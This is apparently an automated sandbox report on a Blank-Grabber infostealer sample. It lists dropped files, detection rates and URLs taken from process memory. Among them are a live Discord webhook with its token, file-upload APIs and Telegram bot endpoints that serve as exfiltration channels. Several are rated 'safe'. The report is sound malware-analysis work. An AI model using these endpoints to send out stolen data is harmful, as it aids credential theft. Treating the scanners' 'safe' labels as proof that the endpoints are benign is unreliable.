              C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_sqlite3.pyd | 3% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\_ssl.pyd | 1% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-console-l1-1-0.dll | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-datetime-l1-1-0.dll | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-debug-l1-1-0.dll | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-errorhandling-l1-1-0.dll | 0% | Virustotal | | Browse
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll | 0% | ReversingLabs | |
              C:\Users\user\AppData\Local\Temp\_MEI74682\api-ms-win-core-fibers-l1-1-0.dll | 0% | Virustotal | | Browse
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              discord.com | 0% | Virustotal | | Browse
              Source | Detection | Scanner | Label | Link
              http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe |
              http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://oneget.orgX | 0% | URL Reputation | safe |
              https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
              http://ocsp.thawte.com0 | 0% | URL Reputation | safe |
              https://discord.com/api/v9/users/ | 0% | Avira URL Cloud | safe |
              http://www.microsoftWARNST~1PMAy.O | 0% | Avira URL Cloud | safe |
              https://api.anonfiles.com/upload | 0% | Avira URL Cloud | safe |
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html | 0% | Avira URL Cloud | safe |
              http://cacerts.digi | 0% | Avira URL Cloud | safe |
              https://bugzilla.mo | 0% | Avira URL Cloud | safe |
              https://foss.heptapod.net/pypy/pypy/-/issues/3539 | 0% | Avira URL Cloud | safe |
              https://api.anonfiles.com/uploadr | 0% | Avira URL Cloud | safe |
              https://discord.com/api/v9/users/ | 0% | Virustotal | | Browse
              http://www.microsoftTIMES~1.JSOy.O | 0% | Avira URL Cloud | safe |
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html | 0% | Virustotal | | Browse
              https://bugzilla.mo | 0% | Virustotal | | Browse
              https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC | 0% | Avira URL Cloud | safe |
              https://api.anonfiles.com/upload | 1% | Virustotal | | Browse
              https://account.bellmedia.c | 0% | Avira URL Cloud | safe |
              http://cacerts.digicert.co | 0% | Avira URL Cloud | safe |
              https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1Ha | 0% | Avira URL Cloud | safe |
              https://api.anonfiles.com/uploadr | 2% | Virustotal | | Browse
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | 0% | Avira URL Cloud | safe |
              https://foss.heptapod.net/pypy/pypy/-/issues/3539 | 0% | Virustotal | | Browse
              https://go.mic | 0% | Avira URL Cloud | safe |
              https://www.amazon.co.uk/ | 0% | Avira URL Cloud | safe |
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | 0% | Avira URL Cloud | safe |
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | 2% | Virustotal | | Browse
              http://cacerts.digicert.co | 0% | Virustotal | | Browse
              https://www.amazon.co.uk/ | 0% | Virustotal | | Browse
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | 2% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              discord.com | 162.159.136.232 | true | true | | unknown
              ip-api.com | 208.95.112.1 | true | false | | high
              blank-kwj1y.in | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              https://discord.com/api/webhooks/1180990550996959354/etoFF7oxewDUkUSy5k9Nl0yqXw0esYNFZVGnAZjRg16T1HayU_0isZXCxwisPvLSjXVC | true | Avira URL Cloud: safe | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://duckduckgo.com/chrome_newtab | mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/Blank-c/BlankOBF | mei.exe, 00000001.00000003.1673205383.000002E9141DE000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1672905829.000002E913BDA000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1673578270.000002E913BD8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1675118927.000002E913BD8000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.avito.ru/ | mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://duckduckgo.com/ac/?q= | mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://api.telegram.org/bot | mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://github.com/Blank-c/Blank-Grabberi | mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.microsoftWARNST~1PMAy.O | mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
              https://github.com/Blank-c/Blank-Grabberr | mei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://www.eclipse.org/b | mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | mei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.leboncoin.fr/ | mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://tools.ietf.org/html/rfc2388#section-4.4 | mei.exe, 00000001.00000003.1788725057.000002E91404C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91404B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91404D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91404B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64 | mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://weibo.com/ | mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035981021.000002E9145F0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://api.anonfiles.com/upload | mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
              https://cdn.discordapp.com/attachments/1180990520542105673/1181873826842284133/Blank-user.rar?ex=65 | mei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.msn.com | mei.exe, 00000001.00000002.2037321445.000002E9155C8000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://nuget.org/nuget.exe | powershell.exe, 00000009.00000002.1743684934.000001BACE158000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C14DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://discord.com/api/v9/users/ | mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
              https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963 | mei.exe, 00000001.00000002.2035597805.000002E9141D0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://cacerts.digi | mei.exe, 00000000.00000003.1655454167.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
              https://peps.python.org/pep-0205/ | mei.exe, 00000001.00000003.1671398631.000002E913B2B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031449289.000002E9139D0000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B19000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1667420967.000002E913B2B000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1727946923.000001BABE0E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000038.00000002.1830961000.000001E1B1461000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://www.amazon.ca/ | mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy | mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | mei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030942122.000002E913518000.00000004.00001000.00020000.00000000.sdmp | false | | high
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
              http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmp | false | | high
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmp | false | | high
              https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | mei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://www.amazon.com/ | mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://github.com/python/cpython/issues/86361. | mei.exe, 00000001.00000003.2028960937.000002E913B95000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031652226.000002E913B95000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1680349233.000002E913BD5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679662803.000002E913F81000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1679790240.000002E913B95000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://contoso.com/Icon | powershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://httpbin.org/ | mei.exe, 00000001.00000002.2031187455.000002E9138E7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmp | false
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.cl.cam.ac.uk/~mgk25/iso-time.htmlmei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • 0%, Virustotal, Browse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2028403305.000002E914194000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2024785294.000002E914187000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906554913.000002E914B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://www.ecosia.org/newtab/mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brmei.exe, 00000001.00000003.1761527994.000002E9140EC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000038.00000002.1830961000.000001E1B168A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://images-ext-1.discordapp.net/external/etSU0hGkd0ttMXA41AUjUl74oI1ajbez8WS2N-KLvK4/https/raw.gmei.exe, 00000001.00000003.2025311292.000002E9140EC000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E914008000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E913FB7000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027051613.000002E9140F9000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2034518667.000002E9140FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535mei.exe, 00000001.00000003.1788584216.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029359579.000002E9139B4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913E8A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913E8C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1785141429.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032296817.000002E913E8D000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913E8B000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2029764503.000002E9139B5000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031403845.000002E9139B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_symei.exe, 00000001.00000003.1662424773.000002E9138D8000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662545867.000002E9138D2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1662461636.000002E9138D1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2030701649.000002E911C7A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://MD8.mozilla.org/1/mmei.exe, 00000001.00000002.2035981021.000002E914628000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.python.org/psf/license/mei.exe, mei.exe, 00000001.00000002.2039190548.00007FFDFB6D8000.00000040.00000001.01000000.00000005.sdmpfalse
                                                                                              high
                                                                                              http://www.eclipse.org/mei.exe, 00000000.00000003.1651177435.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxyPmei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://bugzilla.momei.exe, 00000001.00000002.2035693099.000002E914310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  • 0%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://api.anonfiles.com/uploadrmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • 2%, Virustotal, Browse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://tools.ietf.org/html/rfc6125#section-6.4.3mei.exe, 00000001.00000002.2035788028.000002E9144F8000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000009.00000002.1727946923.000001BABE308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://google.com/mailmei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1819432737.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033294931.000002E91401E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1780553152.000002E91401A000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025893149.000002E91401A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pymei.exe, 00000001.00000002.2031187455.000002E9138D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmmei.exe, 00000001.00000003.1678406179.000002E913C8E000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1678327780.000002E913E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/mei.exe, 00000001.00000002.2035981021.000002E914598000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://foss.heptapod.net/pypy/pypy/-/issues/3539mei.exe, 00000001.00000002.2035597805.000002E9141D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              • 0%, Virustotal, Browse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2031187455.000002E9138E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://google.com/mei.exe, 00000001.00000003.1777251401.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2032511727.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1820288649.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027822583.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2026349478.000002E913F70000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1765729830.000002E913F70000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFmei.exe, 00000001.00000003.1790066765.000002E9141A2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1781296895.000002E9141A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.microsoftTIMES~1.JSOy.Omei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    low
                                                                                                                    https://api.gofile.io/getServerrmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://ocsp.sectigo.com0mei.exe, 00000000.00000003.1649338725.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651785937.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651565231.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650835527.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651177435.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1650171485.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652833619.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652354604.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653171249.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653004204.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652281017.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653792602.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651679430.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1653909478.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1648931758.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1652913404.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1649250703.000001FFF1DD4000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 
00000000.00000003.1649061865.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000000.00000003.1651965508.000001FFF1DE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://www.python.org/download/releases/2.3/mro/.mei.exe, 00000001.00000002.2030942122.000002E913490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://contoso.com/Licensepowershell.exe, 00000038.00000002.1887513922.000001E1C1621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://discordapp.com/api/v9/users/mei.exe, 00000001.00000002.2032019714.000002E913CD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://ip-api.com/json/?fields=225545rmei.exe, 00000001.00000003.1677159074.000002E913C21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=mei.exe, 00000001.00000003.1906554913.000002E914AD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://github.com/urllib3/urllib3/issues/2920mei.exe, 00000001.00000003.1765729830.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1788725057.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1817080943.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2025311292.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1777251401.000002E914078000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.2027450507.000002E91407C000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2035788028.000002E914410000.00000004.00001000.00020000.00000000.sdmp, mei.exe, 00000001.00000002.2033404601.000002E91407C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mei.exe, 00000001.00000003.1906554913.000002E914AE2000.00000004.00000020.00020000.00000000.sdmp, mei.exe, 00000001.00000003.1906554913.000002E914B86000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#mei.exe, 00000000.00000003.1656415860.000001FFF1DD5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
